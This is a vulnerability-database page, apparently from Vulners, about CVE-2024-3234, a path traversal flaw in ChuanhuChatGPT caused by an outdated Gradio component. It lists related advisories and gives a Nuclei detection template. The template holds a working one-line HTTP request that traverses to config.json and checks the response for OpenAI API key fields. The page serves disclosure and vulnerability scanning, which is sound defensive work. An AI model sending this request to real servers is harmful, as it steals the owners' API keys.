| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
| CVE-2023-51449 | 22 Dec 202322:22 | – | circl | |
| Gradio Path Traversal Vulnerability | 22 Dec 202300:00 | – | cnnvd | |
| ChuanhuChatGPT Path Traversal Vulnerability | 6 Jun 202400:00 | – | cnnvd | |
| CVE-2023-51449 | 22 Dec 202320:58 | – | cve | |
| CVE-2024-3234 | 6 Jun 202418:20 | – | cve | |
| CVE-2023-51449 Make the `/file` secure against file traversal attacks | 22 Dec 202320:58 | – | cvelist | |
| CVE-2024-3234 Path Traversal in gaizhenbiao/chuanhuchatgpt | 6 Jun 202418:20 | – | cvelist | |
| Gradio makes the `/file` secure against file traversal and server-side request forgery attacks | 21 Dec 202318:24 | – | github | |
| Gradio Hugging Face - Local File Inclusion | 5 Jul 202603:01 | – | nuclei | |
| CVE-2023-51449 | 22 Dec 202321:15 | – | nvd |
id: CVE-2024-3234
info:
name: Chuanhu Chat - Directory Traversal
author: DhiyaneshDk
severity: critical
description: |
The gaizhenbiao/chuanhuchatgpt application is vulnerable to a path traversal attack due to its use of an outdated gradio component. The application is designed to restrict user access to resources within the `web_assets` folder. However, the outdated version of gradio it employs is susceptible to path traversal, as identified in CVE-2023-51449. This vulnerability allows unauthorized users to bypass the intended restrictions and access sensitive files, such as `config.json`, which contains API keys. The issue affects the latest version of chuanhuchatgpt prior to the fixed version released on 20240305.
impact: |
Unauthenticated attackers can exploit path traversal to access sensitive files including API keys in config.json.
remediation: |
Update chuanhuchatgpt to the fixed version released on 20240305 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-3234
cwe-id: CWE-22
epss-score: 0.03757
epss-percentile: 0.88578
cpe: cpe:2.3:a:gaizhenbiao:chuanhuchatgpt:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: gaizhenbiao
product: chuanhuchatgpt
tags: cve,cve2024,chuanhuchatgpt,lfi,vuln,ai
http:
- raw:
- |
GET /file=web_assets/../config.json HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"openai_api_key":'
- '"openai_api_type":'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402203dadbfdfcd908c299049e0efd8df6d240799efa91d877114ceaceb0f665898de0220126aae46f3e82f2fc39038daee0fc5b9b4287adc20037a487b6bd1bf499a902b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation